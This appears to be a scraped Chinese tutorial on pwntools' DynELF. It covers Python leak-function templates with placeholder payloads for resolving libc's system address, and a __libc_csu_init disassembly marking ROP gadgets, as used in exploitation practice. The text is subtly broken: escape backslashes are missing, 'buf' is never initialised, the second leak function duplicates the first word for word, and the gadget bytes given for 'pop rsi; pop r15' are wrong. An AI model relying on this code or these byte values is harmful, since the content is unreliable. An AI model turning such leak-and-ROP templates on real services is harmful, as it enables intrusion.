DynELF

在没有libc的时候,使用pwntools的DynELF可以来泄露地址
leak函数格式

p = process('./xxx')
def leak(address):
  payload = "xxxxxxxx" + address + "xxxxxxxx"
  p.send(payload)
  #各种处理
  data = p.recv(4)
  log.debug("%#x => %s" % (address, (data or '').encode('hex')))
  return data
d = DynELF(leak, elf=ELF("./xxx"))      #初始化DynELF模块 
systemAddress = d.lookup('system', 'libc')  #在libc文件中搜索system函数的地址

address是需要泄露地址的信息,payload就是触发目标程序泄漏address处信息的攻击代码。

当我们想要调用system函数,就必须找到一个可以泄漏目标程序内部的地址,进而计算出偏移。

文章上介绍的是很常见的puts,write函数


Linux:
write(fd, addr, len) x86下就是正常的参数从右向左进栈。

在x64下通常是rdi,rsi,rdx,rcx,r8,r9从左向右来接收参数,更多的才写到栈上。所以当rop链不能构成时就可以使用 __libc_csu_init函数中的通用gadget。


_libc_csu_init函数是程序调用libc库用来对程序进行初始化的函数,一般先于main函数执行

text:00000000004006E0 ; void _libc_csu_init(void)
.text:00000000004006E0                 public __libc_csu_init
.text:00000000004006E0 __libc_csu_init proc near               ; DATA XREF: _start+16↑o
.text:00000000004006E0 ; __unwind {
.text:00000000004006E0                 push    r15
.text:00000000004006E2                 mov     r15d, edi
.text:00000000004006E5                 push    r14
.text:00000000004006E7                 mov     r14, rsi
.text:00000000004006EA                 push    r13
.text:00000000004006EC                 mov     r13, rdx
.text:00000000004006EF                 push    r12
.text:00000000004006F1                 lea     r12, __frame_dummy_init_array_entry
.text:00000000004006F8                 push    rbp
.text:00000000004006F9                 lea     rbp, __do_global_dtors_aux_fini_array_entry
.text:0000000000400700                 push    rbx
.text:0000000000400701                 sub     rbp, r12
.text:0000000000400704                 xor     ebx, ebx
.text:0000000000400706                 sar     rbp, 3
.text:000000000040070A                 sub     rsp, 8
.text:000000000040070E                 call    _init_proc
.text:0000000000400713                 test    rbp, rbp
.text:0000000000400716                 jz      short loc_400736
.text:0000000000400718                 nop     dword ptr [rax+rax+00000000h]
.text:0000000000400720
.text:0000000000400720 loc_400720:                             ; CODE XREF: __libc_csu_init+54↓j

************************************************************
.text:0000000000400720                 mov     rdx, r13
.text:0000000000400723                 mov     rsi, r14
.text:0000000000400726                 mov     edi, r15d
.text:0000000000400729                 call    qword ptr [r12+rbx*8]
.text:000000000040072D                 add     rbx, 1
.text:0000000000400731                 cmp     rbx, rbp
.text:0000000000400734                 jnz     short loc_400720
.text:0000000000400736
.text:0000000000400736 loc_400736: 

                    ; CODE XREF: __libc_csu_init+36↑j
*************************************************************
.text:0000000000400736                 add     rsp, 8
.text:000000000040073A                 pop     rbx
.text:000000000040073B                 pop     rbp
.text:000000000040073C                 pop     r12
.text:000000000040073E                 pop     r13
.text:0000000000400740                 pop     r14
.text:0000000000400742                 pop     r15
.text:0000000000400744                 retn

这两部分便是gadget,0x040073A处可以把我们想要写入的数据来进行压栈。而且在里面隐藏了两个常用的gadget


DynELF_第1张图片
图片.png

pop rdi;ret和pop rsi;pop r15

0x41 0x5f 0xc3
0x5f 0xc3

puts函数:puts(addr)从地址处输出字符串,当读到"\x00"时截断。
leak函数(之后没有其他输出)

def leak(address):
  count = 0
  data = ''
  payload = xxx
  p.send(payload)
  print p.recvuntil('xxxn') #一定要在puts前释放完输出
  up = ""
  while True:
    #由于接收完标志字符串结束的回车符后,就没有其他输出了,故先等待1秒钟,如果确实接收不到了,就说明输出结束了
    #以便与不是标志字符串结束的回车符(0x0A)混淆,这也利用了recv函数的timeout参数,即当timeout结束后仍得不到输出,则直接返回空字符串””
    c = p.recv(numb=1, timeout=1)
    count += 1
    if up == 'n' and c == "":  #接收到的上一个字符为回车符,而当前接收不到新字符,则
      buf = buf[:-1]             #删除puts函数输出的末尾回车符
      buf += "x00"
      break
    else:
      buf += c
    up = c
  data = buf[:4]  #取指定字节数
  log.info("%#x => %s" % (address, (data or '').encode('hex')))
  return data

还有其他输出

def leak(address):
  count = 0
  data = ''
  payload = xxx
  p.send(payload)
  print p.recvuntil('xxxn') #一定要在puts前释放完输出
  up = ""
  while True:
    #由于接收完标志字符串结束的回车符后,就没有其他输出了,故先等待1秒钟,如果确实接收不到了,就说明输出结束了
    #以便与不是标志字符串结束的回车符(0x0A)混淆,这也利用了recv函数的timeout参数,即当timeout结束后仍得不到输出,则直接返回空字符串””
    c = p.recv(numb=1, timeout=1)
    count += 1
    if up == 'n' and c == "":  #接收到的上一个字符为回车符,而当前接收不到新字符,则
      buf = buf[:-1]             #删除puts函数输出的末尾回车符
      buf += "x00"
      break
    else:
      buf += c
    up = c
  data = buf[:4]  #取指定字节数
  log.info("%#x => %s" % (address, (data or '').encode('hex')))
  return data

你可能感兴趣的:(DynELF)